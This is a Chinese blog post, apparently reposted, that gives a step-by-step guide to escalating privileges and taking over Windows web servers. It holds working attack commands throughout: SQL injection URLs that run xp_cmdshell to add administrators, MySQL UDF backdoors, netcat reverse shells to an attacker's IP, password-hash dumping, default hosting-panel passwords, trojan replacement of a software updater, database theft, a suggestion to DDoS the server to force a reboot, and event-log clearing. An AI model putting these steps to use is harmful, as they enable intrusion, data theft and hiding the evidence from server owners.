提权学习:提权拿服务器方法总结-超细(补充节点0x02)
当你的才华
还撑不起你的野心时
那你就应该静下心来学习
目录
【 web提权 】
dos命令大全
SQL语句直接开启3389
常见杀软
windows提权中敏感目录和敏感注册表的利用
提权中的敏感注册表位置
wscript.shell的删除和恢复
如何找到准确的终端连接端口?
本地溢出提权
sa提权
root提权
serv-u提权
端口转发
nc反弹提权
星外提权
ee提权法
vbs提权法
360提权
搜狗提权
华众虚拟主机提权
N点虚拟主机
拖库
服务器
从网上看到一篇很棒的文章,里面有些问题,在我前几天面试的时候也问到过,很细。我再转发过来,自己从新再整理一下,详细内容如下。
【 web提权 】
1. 能不能执行cmd就看这个命令:
net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user
2. 当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了。
3. cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的,cmd.exe/cmd.com/cmd.txt 都可以。
4. cmd命令:systeminfo,看看有没有KB952004、KB956572、KB970483这三个补丁,如果没有,第一个是pr提权,第二个是巴西烤肉提权,第三个是iis6.0提权。
6. c:\windows\temp\cookies\ 这个目录
7. 找sa密码或是root密码,直接利用大马的文件搜索功能直接搜索,超方便!
8. cmd执行exp没回显的解决方法:
com路径那里输入exp路径C:\RECYCLER\pr.exe,命令那里清空(包括/c )输入"net user jianmei daxia /add"
9. 增加用户并提升为管理员权限之后,如果连接不上3389,上传rootkit.asp脚本,访问会提示登录,用提权成功的账号密码登录进去就可以拥有管理员权限了。
10.有时变态监控不让添加用户,可以尝试抓管理哈希值,上传“PwDump7 破解当前管理密码(hash值)”,俩个都上传,执行PwDump7.exe就可以了,之后到网站去解密即可。
11.有时增加不上用户,有可能是密码过于简单或是过于复杂,还有就是杀软的拦截,命令 tasklist 查看进程
12.其实星外提权只要一个可执行的文件即可,先运行一遍cmd,之后把星外ee.exe命名为log.csv 就可以执行了。
13.用wt.asp扫出来的目录,其中红色的文件可以替换成exp,执行命令时cmd那里输入替换的文件路径,下面清空双引号加增加用户的命令。
14.提权很无奈的时候,可以试试TV远控,通杀内外网,穿透防火墙,很强大的。
15.当可读可写目录存在空格的时候,会出现这样的情况:'C:\Documents' 不是内部或外部命令,也不是可运行的程序 或批处理文件。解决办法是利用菜刀的交互shell切换到exp路径,如:Cd C:\Documents and Settings\All Users\Application Data\Microsoft 目录
然后再执行exp或者cmd,就不会存在上面的情况了,aspshell一般是无法跳转目录的~
16. 有时候可以添加用户,但是添加不到管理组,有可能是administrators改名了,net user administrator 看下本地组成员,*administrators
17. 进入服务器,可以继续内网渗透 这个时候可以尝试打开路由器 默认帐号密码 admin admin
18. 有的cmd执行很变态,asp马里,cmd路径填上面,下面填:""c:\xxx\exp.exe "whoami" 记得前面加两个双引号,不行后面也两个,不行就把exp的路径放在cmd那里,下面不变。
19. 一般增加不上用户,或是想添加增加用户的vbs,bat,远控小马到服务器的启动项里,用“直接使服务器蓝屏重启的东东”这个工具可以实现,
20. 执行PwDump7.exe抓哈希值的时候,建议重定向结果到保存为1.txt /c c:\windows\temp\cookies\PwDump7.exe >1.txt
21. 菜刀执行的技巧,上传cmd到可执行目录,右击cmd 虚拟终端,help 然后setp c:\windows\temp\cmd.exe 设置终端路径为:c:\windows\temp\cmd.exe
22. 当不支持aspx,或是支持但跨不了目录的时候,可以上传一个读iis的vps,执行命令列出所有网站目录,找到主站的目录就可以跨过去了。
上传cscript.exe到可执行目录,接着上传iispwd.vbs到网站根目录,cmd命令/c "c:\windows\temp\cookies\cscript.exe" d:\web\iispwd.vbs
23. 如何辨别服务器是不是内网? 192.168.x.x 172.16.x.x 10.x.x.x
dos命令大全
| 命令 | 命令意思 |
| ver | 查看版本 |
| whoami | 查看权限 |
| systeminfo | 查看配置 |
| net user | 查看用户 |
| tasklist | 查看进程 |
| tasklist /svc | 查看正在运行的服务 |
| query user | 查询管理用户名 |
| ftp 127.0.0.1 | 查看搭建环境 |
| sc qc Mysql | 查看指定服务的路径 |
| net user jianmei daxia.asd /add | 添加一个用户 |
| net localgroup administrators jianmei /add | 提升到管理权限 |
| net user jianmei daxia.asd /add & net localgroup administrators jianmei /add | 添加用户并提升权限 |
| net user jianmei | 查看制定用户信息 |
| net localgroup administrators | 查看所有管理权限的用户 |
| net localgroup "Remote Desktop Users" jianmei /add | 加入远程桌面用户组 |
| mstsc /admin /v:127.0.0.1 | 突破最大连接数 |
| net user jianmei /del | 删除用户 |
| net user administrator daxia.asd | 删除管理员账户 |
| net password daxia.asd | 更改系统登陆密码 |
| net user guest /active:yes | 激活GUEST用户 |
| net start telnet | 开启TELNET服务 |
| net stop "McAfee McShield" | 关闭麦咖啡 |
| net stop sharedaccess | 关闭防火墙 |
| dir c:\windows\ | 查看当前目录的所有文件 |
| type c:\windows\1.asp | 查看制定文件的内容 |
| .... | ..... |
把cmd.exe复制到c:\windows的temp目录下并命名为cmd.txt:copy c:\windows\temp\cookies\cmd.exe c:\windows\temp\cmd.txt
开3389端口的命令:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
查看补丁:
dir c:\windows\>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type a.txt|@find /i “%i”||@echo %i Not Installed!)&del /f /q /a a.txt
SQL语句直接开启3389
3389登陆关键注册表位置:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections
其中键值DenyTSConnections 直接控制着3389的开启和关闭,当该键值为0表示3389开启,1则表示关闭。
而MSSQL的xp_regwrite的存储过程可以对注册进行修改,我们使用这点就可以简单的修改DenyTSConnections键值,从而控制3389的关闭和开启。
开启3389的SQL语句:
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
关闭3389的SQL语句:
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;--
常见杀软
360tray.exe 360实时保护
ZhuDongFangYu.exe 360主动防御
KSafeTray.exe 金山卫士
McAfee McShield.exe 麦咖啡
SafeDogUpdateCenter.exe 服务器安全狗
windows提权中敏感目录和敏感注册表的利用
敏感目录 目录权限 提权用途
| 敏感目录 | 目录权限 | 提权用途 |
| C:\Program Files\ | 默认用户组users对该目录拥有查看权 | 可以查看服务器安装的应用软件 |
| C:\Documents and Settings\All Users\「开始」菜单\程序 Everyone | 拥有查看权限 存放快捷方式 | 可以下载文件,属性查看安装路径 |
| C:\Documents and Settings\All Users\Documents Everyone | 完全控制权限 | 上传执行cmd及exp |
| C:\windows\system32\inetsrv\ Everyone | 完全控制权限 | 上传执行cmd及exp |
| C:\windows\my.iniC:\Program Files\MySQL\MySQL Server 5.0\my.ini | 默认用户组users拥有查看权限 | 安装mysql时会将root密码写入该文件 |
| C:\windows\system32\ | 默认用户组users拥有查看权限Shift后门一般是在该文件夹 | 可以下载后门破解密码 |
| C:\Documents and Settings\All Users\「开始」菜单\程序\启动 Everyone | 拥有查看权限 | 可以尝试向该目录写入vbs或bat,服务器重启后运行 |
| C:\RECYCLER\D:\RECYCLER\ Everyone | 完全控制权限 回收站目录 | 常用于执行cmd及exp |
| C:\Program Files\Microsoft SQL Server\ | 默认用户组users对该目录拥有查看权限 | 收集mssql相关信息,有时候该目录也存在可执行权限 |
| C:\Program Files\MySQL\ | 默认用户组users对该目录拥有查看权限 | 找到MYSQL目录中user.MYD里的root密码 |
| C:\oraclexe\ | 默认用户组users对该目录拥有查看权限 | 可以尝试利用Oracle的默认账户提权 |
| C:\WINDOWS\system32\config | 默认用户组users对该目录拥有查看权限 | 尝试下载sam文件进行破解提权 |
| C:\Program Files\Geme6 FTP Server\Remote Admin\Remote.ini | 默认用户组users对该目录拥有查看权限 | Remote.ini文件中存放着G6FTP的密码 |
| c:\Program Files\RhinoSoft.com\Serv-U\c:\Program Files\Serv-U\ | 默认用户组users对该目录拥有查看权限 | ServUDaemon.ini 中存储了虚拟主机网站路径和密码 |
| c:\windows\system32\inetsrv\MetaBase.xml | 默认用户组users对该目录拥有查看权限 | IIS配置文件 |
| C:tomcat5.0\conf\resin.conf | 默认用户组users对该目录拥有查看权限 | Tomat存放密码的位置 |
| C:\ZKEYS\Setup.ini | 默认用户组users对该目录拥有查看权限 | ZKEYS虚拟主机存放密码的位置 |
提权中的敏感注册表位置
| 注册表位置 | 某某 |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\MSSQLServer\SuperSocketNetLib\Tcp | Mssql端口 |
| HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server DenyTSConnections | 远程终端 值为0 即为开启 |
| HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\ | mssql的注册表位置 |
| HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\ | 华众主机注册表配置位置 |
| HKEY_LOCAL_MACHINE\SOFTWARE\Cat Soft\Serv-U\Domains\1\UserList\ | serv-u的用户及密码(su加密)位置 |
| HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\ WinStations\RDP-Tcp | 在该注册表位置PortNumber的值即位3389端口值 |
| HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers | mysql管理工具Navicat的注册表位置,提权运用请谷歌 |
| HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters | Radmin的配置文件,提权中常将其导出进行进行覆盖提权 |
| HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\ | IIS注册表全版本泄漏用户路径和FTP用户名漏洞 |
| HKEY_LOCAL_MACHINE\software\hzhost\config\Settings\mastersvrpass | 华众主机在注册表中保存的mssql、mysql等密码 |
| HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11 | 星外主机mssql的sa账号密码,双MD5加密 |
| HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\ControlSet002 | 星外ftp的注册表位置,当然也包括ControlSet001、ControlSet003 |
wscript.shell的删除和恢复
卸载wscript.shell对象,在cmd下或直接运行:regsvr32 /u %windir%\system32\WSHom.Ocx
卸载FSO对象,在cmd下或直接运行:regsvr32.exe /u %windir%\system32\scrrun.dll
卸载stream对象,在cmd下或直接运行:regsvr32 /s /u “C:\ProgramFiles\CommonFiles\System\ado\msado15.dll”
如果想恢复的话只需要去掉/U 即可重新再注册以上相关ASP组件,这样子就可以用了
如何找到准确的终端连接端口?
在aspx大马里,点击“系统信息”第三个就是目前的3389端口
或是执行命令查看正在运行的服务:tasklist /svc
找到:svchost.exe 1688 TermService
记住1688这个ID值,
查看开放的所有端口:netstat -ano
找到1688这个ID值所对应的端口就是3389目前的端口
(( iis6提权提示Can not find wmiprvse.exe的突破方法 ))
突破方法一:
在IIS环境下,如果权限做得不严格,我们在aspx大马里面是有权限直接结束wmiprvse.exe进程的,进程查看里面直接K掉
在结束之后,它会再次运行,这时候的PID值的不一样的。这时候我们回来去运行exp,直接秒杀。
突破方法二:
虚拟主机,一般权限严格限制的,是没权限结束的,这时候我们可以考虑配合其他溢出工具让服务器强制重启,比如“直接使服务器蓝屏重启的东东”
甚至可以暴力点,DDOS秒杀之,管理发现服务器不通了首先肯定是以为服务器死机,等他重启下服务器(哪怕是IIS重启下)同样秒杀之。
本地溢出提权
计算机有个地方叫缓存区,程序的缓存区长度是被事先设定好的,如果用户输入的数据超过了这个缓存区的长度,那么这个程序就会溢出了.
缓存区溢出漏洞主要是由于许多软件没有对缓存区检查而造成的.
利用一些现成的造成溢出漏洞的exploit通过运行,把用户从users组或其它系统用户中提升到administrators组.
想要执行cmd命令,就要wscript.shell组建支持,或是支持aspx脚本也行,因为aspx脚本能调用.net组件来执行cmd的命令.
sa提权
扫描开放的端口,1433开了就可以找sa密码提权,用大马里的搜索文件功能,sa密码一般在conn.asp config.asp web.config 这三个文件
也可以通过注册表找配置文件,看下支持aspx不,支持的话跨目录到别的站点上找,找到之后用aspshell自带的sql提权登录再执行命令创建用户即可。
aspx马提权执行命令有点不一样,点击数据库管理--选MSSQL--server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB--输入帐号密码连接即可
增加一个用户:exec master.dbo.xp_cmdshell 'net user jianmei daxia.asd /add';--
提升为管理员:exec master.dbo.xp_cmdshell 'net localgroup administrators jianmei /add';--
PS:如果增加不上,说明是xp_cmdshell组建没有,增加xp_cmdshell组建:Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')
root提权
利用mysql提权的前提就是,服务器安装了mysql,mysql的服务没有降权,是默认安装以系统权限继承的(system权限). 并且获得了root的账号密码
如何判断一台windows服务器上的mysql有没有降权?
cmd命令net user 如果存在 mysql mssql这样用户或者类似的.通常就是它的mssql mysql服务已经被降权运行了
如何判断服务器上是否开启了mysql服务?
开了3306端口,有的管理员会把默认端口改掉.另一个判断方法就是网站是否支持php,一般支持的话都是用mysql数据库的.
如何查看root密码?
在mysql的安装目录下找到user.myd这个文件,root就藏在里面,一般是40位cmd加密,一些php网站安装的时候用的是root用户,在conn.asp config.asp这些文件里。
有时会显得很乱,这时就需要自己去组合,前17位在第一行可以找到,还有23位在第三行或是其他行,自己继续找。
可以直接用php脚本里“mysql执行”,或是上传个UDF.php,如果网站不支持PHP,可以去旁一个php的站,也可以把UDF.php上传到别的phpshell上也可以。
填入帐号密码之后,自然就是安装DLL了,点击“自动安装Mysql BackDoor” 显示导出跟创建函数成功后,紧接着执行增加用户的命令即可。
注意:5.0版本以下(包括5.0的)默认c:\windows\系统目录就可以了,5.1版本以上的不能导出到系统目录下创建自定义函数,只能导出在mysql安装目录下的lib/plugin目录中
例如:D:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/mysql.dll
如果密码看不见,或是组合不到40位,就本地安装一个mysql吧
1、停止mysql服务
2、替换下载下来的3个文件(user.MYI user.MYD user.frm)
3、cmd切换到bin目录下,进入mysql安全模式,cmd命令:mysqld-nt --skip-grant-tables
4、重新打开一个cmd 切换到bin目录下,cmd命令:mysql -u root 版本不同有可能是:mysql -uroot -proot
5、最后查询一下就出来了select user,password from mysql.user;
serv-u提权
这个文件里包含serv-u的md5密码:C:\Program Files\RhinoSoft.com\Serv-U\\ServUDaemon.ini
找到这个文件:ServUDaemon.ini 打开找到:LocalSetupPassword=nqFCE64E0056362E8FCAF813094EC39BC2
再拿md5密文去解密,再用现在的密码登陆提权即可。
serv-u提权的前提是43958端口开了,且知道帐号密码!
如果帐号密码默认,直接用shell里面的serv-u提权功能即可搞定,建议用aspx马、php马去提权,因为可以看回显。
530说明密碼不是默认的,回显330说明成功,900说明密码是默认的.................
在程序里找个快捷方式,或是相关的文件进行下载到本地,再查看文件的属性,就可以找到serv-u的安装目录了。
目录有修改权限之serv-u提权:
找到serv-u的目录,再找到用户的配置文件ServUDaemon.ini,直接增加一个用户代码,保存!
接着本地cmd命令:ftp 服务器ip
回车,输入帐号密码再回车......................
接着先试试普通的cmd命令提权,不行的话就使用ftp提权的命令:
Quote site exec net user jianmei daxia /add 增加一个用户
Quote site exec net localgroup administrators jianmei /add 提升到管理员权限
200 EXEC command successful (TID=33). 执行成功的回显信息
Maintenance=System 权限类型多加一行指定新加帐号为系统管理员
ReloadSettings=True 在修改ini文件后需加入此项,这时serv-u会自动刷新配置文件并生效
端口转发
什么情况下适合转发端口?
1.服务器是内网,我们无法连接。
2.服务器上有防火墙,阻断我们的连接。
转发端口的前提,我们是外网或是有外网服务器。
找个可读可写目录上传lcx.exe
本地cmd命令:lcx.exe -listen 1988 4567 (监听本地1988端口并转发到4567端口)
接着shell命令:/c c:\windows\temp\cookies\lcx.exe -slave 本机ip 1988 服务器ip 3389 (把服务器3389端口转发到本地4567端口)
之后本地连接:127.0.0.1:4567 (如果不想加上:4567的话,本地执行命令的时候,把4567换成3389来执行就行了)
以上是本机外网情况下操作,接着说下在外网服务器里如何操作:
上传lxc.exe cmd.exe到服务器且同一目录,执行cmd.exe命令:lcx.exe -listen 1988 4567
接着在aspxshell里点击端口映射,远程ip改为站点的ip,远端口程填1988,点击映射端口,接着在服务器里连接127.0.0.1:4567就可以了。
nc反弹提权
当可以执行net user,但是不能建立用户时,就可以用NC反弹提权试下,特别是内网服务器,最好用NC反弹提权。
不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口,那么这种方法也失效了….
找个可读可写目录上传nc.exe cmd.exe
-l 监听本地入栈信息
-p port打开本地端口
-t 以telnet形式应答入栈请求
-e 程序重定向
本地cmd执行:nc -vv -l -p 52 进行反弹
接着在shell里执行命令:c:\windows\temp\nc.exe -vv 服务器ip 999 -e c:\windows\temp\cmd.exe 最好是80或8080这样的端口,被防火墙拦截的几率小很多
执行成功后本地cmd命令:cd/ (只是习惯而已)
接着以telnet命令连接服务器:telnet 服务器ip 999
回车出现已选定服务器的ip就说明成功了,接着权限比较大了,尝试建立用户!
坏蛋:
本地cmd执行:nc -vv -l -p 52 进行反弹
c:\windows\temp\nc.exe -e c:\windows\temp\cmd.exe 服务器ip 52
低调小飞:
shell执行命令c:\windows\temp\nc.exe -l -p 110 -t -e c:\windows\temp\cmd.exe
一般这样的格式执行成功率很小,不如直接在cmd那里输入:c:\windows\temp\nc.exe 命令这里输入:-vv 服务器ip 999 -e c:\windows\temp\cmd.exe
这个技巧成功率比上面那个大多了,不单单是nc可以这样,pr这些提权exp也是可以的。
星外提权
如何知道是不是星外主机?
第一:网站物理路径存在“freehost”
第二:asp马里点击程序,存在“7i24虚拟主机管理平台”“星外主机”之类的文件夹
默认帐号:freehostrunat
默认密码:fa41328538d7be36e83ae91a78a1b16f!7
freehostrunat这个用户是安装星外时自动建立的,已属于administrators管理组,而且密码不需要解密,直接登录服务器即可
星外常写目录:
C:\RECYCLER\
C:\windows\temp\
e:\recycler\
f:\recycler\
C:\php\PEAR\
C:\WINDOWS\7i24.com\FreeHost
C:\php\dev
C:\System Volume Information
C:\7i24.com\serverdoctor\log\
C:\WINDOWS\Temp\
c:\windows\hchiblis.ibl
C:\7i24.com\iissafe\log\
C:\7i24.com\LinkGate\log
C:\Program Files\Thunder Network\Thunder7\
C:\Program Files\Thunder Network\Thunder\
C:\Program Files\Symantec AntiVirus\SAVRT\
c:\windows\DriverPacks\C\AM2
C:\Program Files\FlashFXP\
c:\Program Files\Microsoft SQL Server\90\Shared\ErrorDumps\
C:\Program Files\Zend\ZendOptimizer-3.3.0\
C:\Program Files\Common Files\
c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv
c:\Program Files\360\360Safe\deepscan\Section\mutex.db
c:\Program Files\Helicon\ISAPI_Rewrite3\error.log
c:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log
c:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf
c:\Program Files\Common Files\Symantec Shared\Persist.bak
c:\Program Files\Common Files\Symantec Shared\Validate.dat
c:\Program Files\Common Files\Symantec Shared\Validate.dat
C:\Program Files\Zend\ZendOptimizer-3.3.0\docs
C:\Documents and Settings\All Users\DRM\
C:\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection
C:\Documents and Settings\All Users\Application Data\360safe\softmgr\
C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll
C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\
ee提权法
找个可读可写目录上传ee.exe
cmd命令:/c c:\windows\temp\cookies\ee.exe -i (获取星外帐号的id值,例如回显:FreeHost ID:724)
接着命令:/c c:\windows\temp\cookies\ee.exe -u 724 (获取星外的帐号密码)
vbs提权法
找个可读可写目录上传cscript.exe iispwd.vbs
cmd命令:/c "c:\windows\temp\cookies\cscript.exe" c:\windows\temp\cookies\iispwd.vbs
意思是读取iis,这样一来,不但可以获取星外的帐号密码,还可以看到同服务器上的所有站点的目录。
可行思路大全:
经测试以下目录中的文件权限均为everyone,可以修改,可以上传同文件名替换,删除,最重要的是还可以执行:
360杀毒db文件替换:
c:\Program Files\360\360SD\deepscan\Section\mutex.db
c:\Program Files\360\360Safe\deepscan\Section\mutex.db
C:\Program Files\360\360Safe\AntiSection\mutex.db
IISrewrite3 文件替换:
C:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log
C:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf
C:\Program Files\Helicon\ISAPI_Rewrite3\error.log
诺顿杀毒文件替换:
c:\Program Files\Common Files\Symantec Shared\Persist.bak
c:\Program Files\Common Files\Symantec Shared\Validate.dat
c:\Program Files\Common Files\Symantec Shared\Persist.Dat
一流过滤相关目录及文件:
C:\7i24.com\iissafe\log\startandiischeck.txt
C:\7i24.com\iissafe\log\scanlog.htm
其他:
Zend文件替换:C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll
华盾文件替换:C:\WINDOWS\hchiblis.ibl
Flash文件替换:C:\WINDOWS\system32\Macromed\Flash\Flash10q.ocx
DU Meter流量统计信息日志文件替换:c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv
360提权
找个可读可写目录上传360.exe
cmd命令:/c c:\windows\temp\cookies\360.exe
会提示3段英文:
360 Antivirus Privilege Escalation Exploit By friddy 2010.2.2
You will get a Shift5 door!
Shift5 Backdoor created!
这是成功的征兆,接着连接服务器连按5下shift键,将弹出任务管理器,点击新建任务:explorer.exe 会出现桌面,接下来大家都会弄了......
搜狗提权
搜狗的目录默认是可读可写的,搜狗每隔一段时间就会自动升级,而升级的文件是pinyinup.exe
我们只要把这个文件替换为自己的远控木马,或是添加账户的批处理,等搜狗升级的时候,就可以达成我们的目的了。
华众虚拟主机提权
就经验来说,一般溢出提权对虚拟主机是无果的,而且华众又没有星外那么明显的漏洞。
所以华众提权关键之处就是搜集信息,主要注册表位置:
HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\
HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass root密码
HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mssqlpss sa 密码
c:\windows\temp 下有hzhost主机留下的ftp登陆记录有用户名和密码
以上信息配合hzhosts华众虚拟主机系统6.x 破解数据库密码工具使用
百度搜索:hzhosts华众虚拟主机系统6.x 破解数据库密码工具
N点虚拟主机
N点虚拟主机管理系统默认数据库地址为:\host_date\#host # date#.mdb
rl直接输入不行 这里咱们替换下 #=%23 空格=%20
修改后的下载地址为/host_date/%23host%20%23%20date%23196.mdb
N点数据库下载之后找到sitehost表 FTPuser&FTPpass 值 FTPpass是N点加密数据然后用N点解密工具解密得到FTP密码
N点默认安装路径C:\Program Files\NpointSoft\npointhost\web\
D:\Program Files\NpointSoft\npointhost\web\
默认权限可读。遇到对方所用虚拟主机是N点时候 可以考虑 读取该文件夹下载数据库
N点解密工具代码
<%
set iishost=server.CreateObject(“npoint.host”)
x=iishost.Eduserpassword(“FTPpass值”,0)
response.write x
%>
本地搭建N点环境在N点目录打开访问即可。得到密码减去后10位字符即为 N点的虚拟主机管理密码。
然后需要在管理系统登陆确认下 在hostcs 表 找到 Hostip 或者hostdomain
一般默认是 Hostip=127.0.0.1 hostdomain=www.npointhost.com 这里可以不管 因为 这里不修改的话就是服务器默认ip地址sitehost 表的host_domain就是绑定的域名 直接查下IP地址即可 咱们批量的话 扫描的地址即可。
管理系统地址即为IP地址 选择虚拟主机 登录即可
接下来传shell大家应该都会了。
接下来说提权 hostcs表存有sa root账户的密码 解密方法一样。默认都是 解密结果123456
还有就是在adminlogo 存在N点系统管理密码 30位的cfs加密可以在http://www.md5.com.cn/cfs 碰撞下试试 或者用asm的工具破解下我的运气不好没成功过
3057C0DB854C878E72756088058775 这个是默认admin的密码
拖库
access数据库脱裤很简单,直接下载数据库即可,mssql数据库可以用shell自带的脱裤功能,也可以用asp脱裤脚本,找到数据库连接信息的文件,例如:web.config.asp
用帐号密码登录asp脱裤脚本,找到管理表,再找到会员库(UserInfo),之后导出即可,mysql数据库一般用php脚本,找网站数据连接信息:
'host' => 'localhost:3306', 数据库ip
'user' => 'iwebs', 用户
'passwd' => 'nnY5bvRNnJ4vKpmb', 密码
'name' => 'iwebshop', 数据库名
接着上传php脱裤脚本,进入拖库界面之后,左边有一个选择数据库名的选项,这里是iwebshop,选择数据库名之后,就会出现列表,想脱哪个就点击哪个,然后点击select data
Import是导入的意思,而Export是导出的意思,我们在拖库,当然是选择Export了,之后选择save,再点击Export就开始脱裤了。
如果服务器上安装了phpmysql,也可以找到该页面,用刚找到的root账号密码登录进去,在里面也是可以拖库的,如同上传php拖库脚本一样,操作差不多的。
服务器
命令提示符已被系统管理员停用?
解决方法:运行→gpedit.msc→用户配置→管理模板→系统,在右侧找到"阻止命令提示符", 然后双击一下,在"设置"里面选中"未配置" ,最后点击"确定"。
如何判断服务器的类型?
解决方法:直接ping服务器ip,看回显信息进行判断
TTL=32 9X/ME
TTL=64 linux
TTL=128 2000X/XP
TTL=255 UNIX
为什么有时3389开放却不能连接?
原因分析:有时候是因为防火墙,把3389转发到其他端口就可以连接了,有的转发后依然是连接不上,那是因为管理员在TCP/IP里设置的端口限制
解决方法:我们需要把端口转为TCP/IP里设置的只允许连接的端口其中一个就可以了,更好的办法是取消端口限制。
最简单的往服务器上传东西方法是什么?
本机打开“HFS网络文件服务器”这款工具,把需要上传的工具直接拖进左边第一个框内,复制上面的地址,到服务器里的浏览器访问,就可以下载了
限制“命令提示符”的运行权限?
我的电脑(右键)--资源管理器中--点击“工具”按钮,选择“文件夹选项”,切换到“查看”标签,去掉“使用简单文件共享(推荐)”前面的钩,这一步是为了让文件的属性菜单中显示“安全”标签,然后进入“c:\windows\system32\”,找到“cmd.exe”,点右键选择“属性”,切换到“安全”标签,将其中“组或用户名称”中除了管理员外的所有用户都删除,完成后点“确定”这样当普通用户想运行“命令提示符”的时候将会出现“拒绝访问”的警告框。
如何更改windows2003最大连接数?
windows2003中的远程桌面功能非常方便,但是初始设置只允许2个用户同时登陆,有些时候因为我在公司连接登陆后断开,同事在家里用其他用户登陆后断开,当我再进行连接的时候,总是报错“终端服务超过最大连接数”这时候我和同事都不能登陆,通过以下方法来增加连接数,运行:services.msc,启用license logging,别忘了添加完毕后再关闭 License Logging
打开win2k3的控制面板中的“授权”,点“添加许可”输入要改的连接数
如何清除服务器里的IP记录日志?
1.我的电脑右键管理--事件查看器--安全性--右键清除所有事件
2.打开我的电脑--C盘--WINDOWS--system32--config--AppEvent.Evt属性--安全--全部都拒绝
3.Klaklog.evt属性--安全--全部都拒绝--SecEvent.Tvt属性--安全--全部都拒绝
我不需要自由,只想背着她的梦
一步步向前走,她给的永远不重
提权学习:提权拿服务器方法总结-超细(补充节点0x02)相关推荐
- 提权学习之旅——Linux操作系统提权
首发于先知社区 https://xz.aliyun.com/t/8139 前言: 上次学习了Windows操作系统的提权以及相关工具的利用,这次就来学习一下Linux操作系统的提权 Linux提权基础 ...
- 提权学习之旅——基础篇
首发于先知社区 https://xz.aliyun.com/t/8054 前言: 无论是CTF赛题还是渗透测试,有很多时候拿到WebShell的权限并不高,没有办法继续深入,所以需要进行提权操作,方便 ...
- 提权学习:第三方软件提权(Radmin 提权) 4899
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 Radmin 提权 0x01 介绍 0x02 利用方式 常见虚拟主机常见路径 第一种方式:手工查询注册表爆hash值 第二种方式:通过大马 ...
- 提权学习:第三方软件提权(Server-u 提权)43958
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 第三方软件提权 Server-u 提权 Serv-U FTP Server,是一种被广泛运用的FTP服务器端软件,支持3x/9x/ME/NT/2 ...
- 提权学习:第三方软件提权(PcAnywhere 提权)5631
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 第三方软件提权 PcAnywhere 提权 0x01 介绍 0x02 原理 0x03 前言 0x04 思路: 0x05 操作步骤演示: 0 ...
- 提权系列(一)----Windows Service 服务器提权初识与exp提权,mysql提权
一.初识提权 很多时候我们入侵一个网站的时候,想要的是得到这个服务器的权限,也就是admin权限,但是一般默认得到的是普通用的地权限,权限很小,所以就要通过其他手段,提升自己的权限. 提权是将服务器的 ...
- mysql进行mof提权_MySQL数据库Root权限MOF方法提权研究
MySQL数据库Root权限MOF方法提权研究 MySQL Root权限MOF方法提权是来自国外Kingcope大牛发布的MySQL Scanner & MySQL Server for Wi ...
- Day1——提权学习之提权基础
0x00 提权技术分类 大概分为三种: 1.系统溢出漏洞提权 2.数据库提权 3.第三方软件提权 0x01 通常脚本所处的权限 1.asp / php 匿名权限(网络服务权限) 2.aspx user ...
- 提权 --Windows提权方式总结
文章目录 一.提权含义 二.环境搭建 2.1 环境一览 2.2 靶机环境搭建 三.信息收集 3.1前提条件 3.2 基本信息收集 3.2.1 判断操作系统 3.2.2 判别当前权限 3.2.3 其它信 ...
- 6-vulnhub靶场-LordOfTheRoot_1.0.1靶机内核提权udf提权缓冲区溢出提权
6-LordOfTheRoot_1.0.1 靶机地址 https://www.vulnhub.com/entry/lord-of-the-root-101,129/ 难度 中等(主要是缓冲区溢出) 1 ...
最新文章
- mysql数据库是一个软件呐_15款好用的mysql管理软件
- pvrect r语言 聚类_R语言一条命令实现基于样本和距离的聚类分析
